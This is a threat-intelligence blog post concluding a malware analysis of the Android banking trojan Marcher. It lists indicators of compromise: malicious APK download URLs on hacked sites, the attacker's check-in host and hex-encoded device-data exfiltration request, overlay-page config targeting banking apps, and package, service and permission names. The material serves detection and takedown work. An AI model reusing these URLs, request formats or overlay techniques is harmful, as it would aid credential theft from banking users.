Recent Posts

Recent Blog Posts

The PhishLabs Blog

Android.Trojan.Marcher - Conclusion

Posted by Don Jackson, Director of Threat Intelligence on Jan 29, '16
Find me on:

About Parts One and Two

This post is a conclusion to a three-part blog analyzing "Marcher" malware that targets the Android platform. Read part one here and part two here.  To round out the discussion, let’s cover the network and host indicators associated with this trojan.

Network Indicators

Download URLs

In the most recent campaigns, filenames for the Marcher trojan APK file appear to spoof the legitimate Google Play Store app and the Amazon app:

  • playstore.apk
  • amazon.apk
  • Amazon%20.apk or "Amazon .apk" (obfuscated using whitespace)

 Download URLs are typically in the format:

 http://{compromised-domain}/{path}/cache{32-hex-digits}/{filename}.apk{optional-parameters}

 Download links may also have extra HTTP GET request parameters appended to the URL, almost always "sec" and "token" without any values:

  • ?sec=&token=
  • ?sec=&token=
  • ?sec=
  • ?sec
  • ?sec=&token=
  • ?sec=&token=

Legitimate websites used to host the malware are compromised through the exploitation of various webapp vulnerabilities, often in WordPress, as indicated in the following samples of actual download URLs:

  • http://kippiesbe.com/wp-content/plugins/woocommerce-products-slider/js/cache5a1c16360423f7ec195f005769b63913/amazon.apk
  • http://myoptimumgolf.com/wp-admin/css/colors/ectoplasm/cache29f33503d0d1554727cb256794751303/playstore.apk?sec=
  • http://londongoods.com/powermaid/music/cache65f1c1002b1342857ec96dd64121f330/amazon.apk?sec=&token=

Outbound Check-in Requests

The Marcher trojan is a "fire and forget" type of malware.  Once distributed, the attacker sits back passively and collects any stolen data.  It does not have not have an active command and control channel.  Its configuration is embedded into the trojan's code, and the overlaid phishing pages are coded to send the stolen credentials and other data off to the attacker; the trojan itself has no concept of a "drop server".

However, Marcher does check into and fetch the fake overlay webpages from a (pre-configured) remote server on-demand, as each monitored package name is detected.  Typically, these webpages are hosted on a server with a domain name controlled by the attacker.  Outbound connections for initial check-in typically follow the pattern:

http://{attacker-created-domain-name}/{path}/get.php

Virtually all Marcher variants use a short path and "get.php", as in this actual example:

http://xasdasd23.com/so/get.php

Initial check-ins are HTTP POST requests with hex-encoded data in the request body:

POST /so/get.php HTTP/1.1

Host: xasdasd23.com

69643D363931316262346136336239343134663130633366353462633237373565373826696E666F3D696D65692533412B3135323031383237343430313539332532432B636F756E7472792533412B75732532432B63656C6C2533412B416E64726F69642532432B616E64726F69642533412B342E302E342532432B6D6F64656C2533412B73616D73756E672B4E657875732B532532432B6170706C69636174696F6E732533412B616E64726F69642537432B616E64726F6964253743636F6D2E616E64726F69642E6261636B7570636F6E6669726D253743636F6D2E616E64726F69642E62726F77736572253743636F6D2E616E64726F69642E63616C6375...

In this case, decoding the data shows it contains an infection ID, device information such as OS version and device model, along with a list of applications that are installed (truncated for this blog):

id=6911bb4a63b9414f10c3f54bc2775e78&info=imei%3A+152018274401593%2C+country%3A+us%2C+cell%3A+Android%2C+android%3A+4.0.4%2C+model%3A+samsung+Nexus+S%2C+applications%3A+android%7C+android%7Ccom.android.backupconfirm%7Ccom.android.browser%7Ccom.android.calcu...

Occasionally, the check-in URL will also have an "ai" parameter appended:

http://manaclubs.tk/li/get.php?ai=616

The breakdown of observed registration/check-in servers by country is illustrated in the chart below. 

marcher_4.png

Chart 1 - Breakdown of Marcher Registration/Check-in URLs by country

Fetching of fake webpages

The targeted app's respective fake overlay pages are encoded into the Marcher trojan's executable code.  They are typically in a subdirectory under the location of the get.php file in the check-in URL as in this actual example:

http://xasdasd23.com/so/l/05.php

They are typically PHP pages named using a zero-padded, two-digit numbering scheme ("01.php", "02.php", etc.).  However some of the more interactive, multi-step forms are inside a separate directory.  For example, the following configuration data structure definition:

[{\"to\": \"com.starfinanz.smob.android.sfinanzstatus\",\"body\": \" http://xasdasd23.com/so/l/sparkasse/\"},{\"to\": \"com.starfinanz.smob.android.sbanking\",\"body\": \" http://xasdasd23.com/so/l/sparkasse/\"},{\"to\": \"de.sparkasse\",\"body\": \" http://xasdasd23.com/so/l/sparkasse/\"}...

... tells Marcher to look for apps belonging to Star Finanz and Sparkasse and overlay the webpage at "http://xasdasd23.com/so/l/sparkasse/" instead of a numbered PHP page.

 Many of the HTML webpages contain a string similar to:

<!-- Mirrored from copycat.su/formos/05.html by HTTrack Website Copier/3.x [XR&CO'2014], Tue, 21 Jul 2015 12:41:12 GMT -->

Host Indicators (on the Device)

File Sizes

The Marcher APK file is much smaller than those for the legitimate apps as which it masquerades.  The latest Marcher samples are approximately 1.35 MB.  Others also in the wild are about 1.1 MB.  Older, defunct versions are even smaller.  The legitimate apps Marcher has impersonated range in size from approximately 5 MB to more than 30 MB. 

Package Characteristics

On the device itself, Marcher is installed as a standard Android package using only "assets" (configuration files, images and icons, etc.) and Dalvik bytecode (the cross-platform executable instructions).  There is no platform (ARM, x86, MIPS, etc.) native code.

The application package is signed.  A technically valid digital signature is required to install any APK.  All specimens examined have used a self-signed certificate that does not match back up to any trusted certificate authority (CA).  The "CN" (common name) for both the "Issuer" and the "Subject" fields in the certificate typically match.  In some names, these fields' value appear arbitrary, such as "newkiss"; however other samples have spoofed "Google, Inc.", for example.  Of course, in the latter case, validation of that will fail.

The package name can vary, and the names used so far appear to be arbitrarily chosen.  As an example, in one sample (MD5: c0596e35bd67ccc05c682e7a9c5befa0), the main package name is simply "com.fineproj".

All Marcher samples to date have a specific sub-package name, "googleplay", directly beneath the main package. 

Activities

All Marcher samples to date have a specific set of "activity" names.  For example:

  • fineproj.googleplay.DialogGooglePlayCard
  • fineproj.googleplay.DialogGooglePlayPassword
  • fineproj.googleplay.DialogCustomWeb
  • fineproj.googleplay.DialogWebView
  • fineproj.googleplay.FreeDialog

 These are related to Marcher's original design purpose from the very first version, to phish Google Play credentials. 

Services

All Marcher samples to date also have a standard set of services:

  • fineproj.MainService
  • fineproj.USSDService
  • fineproj.googleplay.GPService
 

Required Android Versions

All Marcher samples to date require at least Android 2.1 "Eclair" (API Level 7) to run correctly.  The app's target version has increased as new versions of Android have been released.  The latest samples are designed to run on Android 5.1 "Lollipop" (API Level 22).  PhishLabs has not yet observed Marcher samples that target Android 6.0 "Marshmallow" (API Level 23); however there appears to be no reason that Marcher is incompatible with that latest version.  The target version simply seems to be dependent on the maximum version supported by the malware developer's Android SDK version and configuration.

Permissions

The full set of specific permissions required by Marcher is:

  • permission.SEND_SMS (send SMS messages)
  • permission.USES_POLICY_FORCE_LOCK (Unknown permission from android reference)
  • permission.RECEIVE_BOOT_COMPLETED (automatically start at boot)
  • permission.READ_PHONE_STATE (read phone state and identity)
  • permission.VIBRATE (control vibrator)
  • permission.DEVICE_POWER (turn phone on or off)
  • permission.ACCESS_NETWORK_STATE (view network status)
  • permission.WAKE_LOCK (prevent phone from sleeping)
  • permission.GET_TASKS (retrieve running applications)
  • permission.CALL_PHONE (directly call phone numbers)
  • permission.WRITE_SETTINGS (modify global system settings)
  • permission.RECEIVE_SMS (receive SMS)
  • permission.INTERNET (full Internet access)
  • permission.READ_CONTACTS (read contact data)

Marcher requests permissions that can be abused to manipulate SMS, perform payments, access the Internet (phishing pages), and access private information.

Conclusion

The Marcher trojan for Android platforms is available for purchase on the cyber underground.  It is widely distributed and used by different threat actors to phish login credentials and other sensitive data from infected users of popular mobile banking and finance apps.  It's fairly polished and successful as a tool used by cybercriminals to facilitate account takeover.  However, there are certain code artifacts and network indicators that can be used to identify the mobile malware and initiate takedown of hosting infrastructure.  For more information contact PhishLabs.

Topics: Phishing, Malware, Threat Intelligence, Android, Banking Trojan

What's this all about?

The PhishLabs Blog is where we share our insights and thoughts on cybercrime and online fraud.

Recent Posts

Subscribe to Email Updates

Posts by Topic

see all